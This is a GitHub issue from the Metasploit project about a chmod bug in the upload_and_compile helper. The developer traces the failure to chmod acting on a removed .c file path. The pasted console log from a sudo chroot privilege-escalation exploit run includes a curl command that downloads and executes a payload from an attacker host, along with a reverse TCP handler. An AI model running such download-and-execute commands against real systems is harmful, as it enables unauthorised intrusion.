Skip to content

Meterpreter chmod fails #20405

New issue
New issue
Closed
Closed
Meterpreter chmod fails#20405
Assignees
msutovsky-r7
Labels
bug
@msutovsky-r7

Description

@msutovsky-r7
msutovsky-r7
opened on Jul 22, 2025

Encountered following issue when testing #20376 :

msf6 exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true
[*] Command to run on remote host: curl -so ./EOAFoxbYWq http://192.168.168.128:8080/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./EOAFoxbYWq;./EOAFoxbYWq&
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Writing '/tmp/km0irvx' (118 bytes) ...
[*] Creating directory /tmp/XbXFPm
[*] /tmp/XbXFPm created
[*] Creating directory VvkuY
[*] VvkuY created
[*] Creating directory VvkuY/etc
[*] VvkuY/etc created
[*] Creating directory libnss_
[*] libnss_ created
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_chmod: Operation failed: 1
[!] Attempting to delete working directory /tmp/XbXFPm
[-] Exploit failed: stdapi_fs_getwd: Operation failed: 2
[*] Exploit completed, but no session was created.

The issue seems to be connected to this part:

        def upload_and_compile(path, data, compiler_args = '') 
            [snipped]
             path = "#{path}.c" unless path.end_with?('.c')
            [snipped]
            compiler_cmd = "#{compiler} -o '#{path.sub(/\.c$/, '')}' '#{path}'"
            if session.type == 'shell'
              compiler_cmd = "PATH=\"$PATH:/usr/bin/\" #{compiler_cmd}"
            end 
  
            [snipped]

            rm_f path.to_s
  
            unless success
              message = "#{path} failed to compile."
              # don't mention the COMPILE option if it was deregistered
              message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')
              fail_with Module::Failure::BadConfig, message
            end
  
            chmod path
          end

First, the function will create variable path, to which it appends .c if it does not already ends with .c. Then it will save the data into that file and tries to compile it in executable. Next, it tries to remove .c file and subsequently tries to chmod the same file. Files that do not end with .c are causing an error, because the code kinda assumes (but not really, see path = "#{path}.c" unless path.end_with?('.c')) that path will be .c file.

Metadata

Metadata

Assignees

Labels

bug

Type

No type

Projects

Metasploit Kanban

Status

Done

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions